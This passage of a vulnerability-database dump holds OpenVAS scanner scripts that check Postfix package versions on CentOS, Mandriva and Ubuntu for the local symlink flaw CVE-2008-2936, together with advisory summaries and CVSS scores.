If a local\n user has write access to a mail spool directory with no root mailbox, it\n may be possible for them to append arbitrary data to files that root has\n write permission to. (CVE-2008-2936)\n \n Red Hat would like to thank Sebastian Krahmer for responsibly disclosing\n this issue.\n \n All users of postfix should upgrade to these updated packages, which\n contain a backported patch that resolves this issue.\";\n\ntag_affected = \"postfix on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-August/015185.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880268\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0839\");\n script_cve_id(\"CVE-2008-2936\");\n script_name( \"CentOS Update for postfix CESA-2008:0839 centos3 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of postfix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = 
\"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.0.16~14.1.RHEL3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "description": "Check for the Version of postfix", "modified": "2017-07-06T00:00:00", "published": "2009-04-09T00:00:00", "id": "OPENVAS:830713", "href": "http://plugins.openvas.org/nasl.php?oid=830713", "type": "openvas", "title": "Mandriva Update for postfix MDVSA-2008:171 (postfix)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for postfix MDVSA-2008:171 (postfix)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Sebastian Krahmer of the SUSE Security Team discovered a flaw in\n the way Postfix dereferenced symbolic links. If a local user had\n write access to a mail spool directory without a root mailbox file,\n it could be possible for them to append arbitrary data to files that\n root had write permissions to (CVE-2008-2936).\n\n The updated packages have been patched to correct this issue.\";\n\ntag_affected = \"postfix on Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64,\n Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2008.1,\n Mandriva Linux 2008.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-08/msg00014.php\");\n script_id(830713);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:18:58 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2008:171\");\n script_cve_id(\"CVE-2008-2936\");\n script_name( \"Mandriva Update for postfix MDVSA-2008:171 (postfix)\");\n\n script_summary(\"Check for the Version of postfix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpostfix1\", rpm:\"libpostfix1~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-ldap\", rpm:\"postfix-ldap~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-mysql\", rpm:\"postfix-mysql~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pcre\", rpm:\"postfix-pcre~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pgsql\", rpm:\"postfix-pgsql~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64postfix1\", rpm:\"lib64postfix1~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpostfix1\", rpm:\"libpostfix1~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n 
{\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-ldap\", rpm:\"postfix-ldap~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-mysql\", rpm:\"postfix-mysql~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pcre\", rpm:\"postfix-pcre~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pgsql\", rpm:\"postfix-pgsql~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64postfix1\", rpm:\"lib64postfix1~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpostfix1\", rpm:\"libpostfix1~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-ldap\", rpm:\"postfix-ldap~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-mysql\", rpm:\"postfix-mysql~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pcre\", rpm:\"postfix-pcre~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"postfix-pgsql\", rpm:\"postfix-pgsql~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64postfix1\", rpm:\"lib64postfix1~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:28:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-636-1", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "id": "OPENVAS:840190", "href": "http://plugins.openvas.org/nasl.php?oid=840190", "type": "openvas", "title": "Ubuntu Update for postfix vulnerability USN-636-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_636_1.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for postfix vulnerability USN-636-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Sebastian Krahmer discovered that Postfix was not correctly handling\n mailbox ownership when dealing with Linux's implementation of hardlinking\n to symlinks. In certain mail spool configurations, a local attacker\n could exploit this to append data to arbitrary files as the root user.\n The default Ubuntu configuration was not vulnerable.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-636-1\";\ntag_affected = \"postfix vulnerability on Ubuntu 6.06 LTS ,\n Ubuntu 7.04 ,\n Ubuntu 7.10 ,\n Ubuntu 8.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-636-1/\");\n script_id(840190);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:59:50 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"636-1\");\n script_cve_id(\"CVE-2008-2936\");\n script_name( \"Ubuntu Update for postfix vulnerability USN-636-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n 
script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"postfix-ldap\", ver:\"2.2.10-1ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-mysql\", ver:\"2.2.10-1ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-pcre\", ver:\"2.2.10-1ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-pgsql\", ver:\"2.2.10-1ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix\", ver:\"2.2.10-1ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-dev\", ver:\"2.2.10-1ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-doc\", ver:\"2.2.10-1ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU7.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"postfix-cdb\", ver:\"2.3.8-2ubuntu0.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-ldap\", ver:\"2.3.8-2ubuntu0.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"postfix-mysql\", ver:\"2.3.8-2ubuntu0.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-pcre\", ver:\"2.3.8-2ubuntu0.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-pgsql\", ver:\"2.3.8-2ubuntu0.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix\", ver:\"2.3.8-2ubuntu0.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-dev\", ver:\"2.3.8-2ubuntu0.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-doc\", ver:\"2.3.8-2ubuntu0.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"postfix-cdb\", ver:\"2.5.1-2ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-ldap\", ver:\"2.5.1-2ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-mysql\", ver:\"2.5.1-2ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-pcre\", ver:\"2.5.1-2ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-pgsql\", ver:\"2.5.1-2ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix\", ver:\"2.5.1-2ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-dev\", 
ver:\"2.5.1-2ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-doc\", ver:\"2.5.1-2ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU7.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"postfix-cdb\", ver:\"2.4.5-3ubuntu1.2\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-ldap\", ver:\"2.4.5-3ubuntu1.2\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-mysql\", ver:\"2.4.5-3ubuntu1.2\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-pcre\", ver:\"2.4.5-3ubuntu1.2\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-pgsql\", ver:\"2.4.5-3ubuntu1.2\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix\", ver:\"2.4.5-3ubuntu1.2\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-dev\", ver:\"2.4.5-3ubuntu1.2\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-doc\", ver:\"2.4.5-3ubuntu1.2\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "description": "Check for the Version of postfix", "modified": "2018-04-06T00:00:00", "published": "2009-04-09T00:00:00", "id": 
"OPENVAS:1361412562310830713", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830713", "type": "openvas", "title": "Mandriva Update for postfix MDVSA-2008:171 (postfix)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for postfix MDVSA-2008:171 (postfix)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Sebastian Krahmer of the SUSE Security Team discovered a flaw in\n the way Postfix dereferenced symbolic links. 
If a local user had\n write access to a mail spool directory without a root mailbox file,\n it could be possible for them to append arbitrary data to files that\n root had write permissions to (CVE-2008-2936).\n\n The updated packages have been patched to correct this issue.\";\n\ntag_affected = \"postfix on Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64,\n Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2008.1,\n Mandriva Linux 2008.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-08/msg00014.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830713\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:18:58 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2008:171\");\n script_cve_id(\"CVE-2008-2936\");\n script_name( \"Mandriva Update for postfix MDVSA-2008:171 (postfix)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of postfix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpostfix1\", rpm:\"libpostfix1~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-ldap\", rpm:\"postfix-ldap~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-mysql\", rpm:\"postfix-mysql~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pcre\", rpm:\"postfix-pcre~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pgsql\", rpm:\"postfix-pgsql~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64postfix1\", rpm:\"lib64postfix1~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpostfix1\", rpm:\"libpostfix1~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-ldap\", rpm:\"postfix-ldap~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-mysql\", rpm:\"postfix-mysql~2.4.5~2.1mdv2008.0\", 
rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pcre\", rpm:\"postfix-pcre~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pgsql\", rpm:\"postfix-pgsql~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64postfix1\", rpm:\"lib64postfix1~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpostfix1\", rpm:\"libpostfix1~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-ldap\", rpm:\"postfix-ldap~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-mysql\", rpm:\"postfix-mysql~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pcre\", rpm:\"postfix-pcre~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pgsql\", rpm:\"postfix-pgsql~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64postfix1\", rpm:\"lib64postfix1~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.2, "vector": 
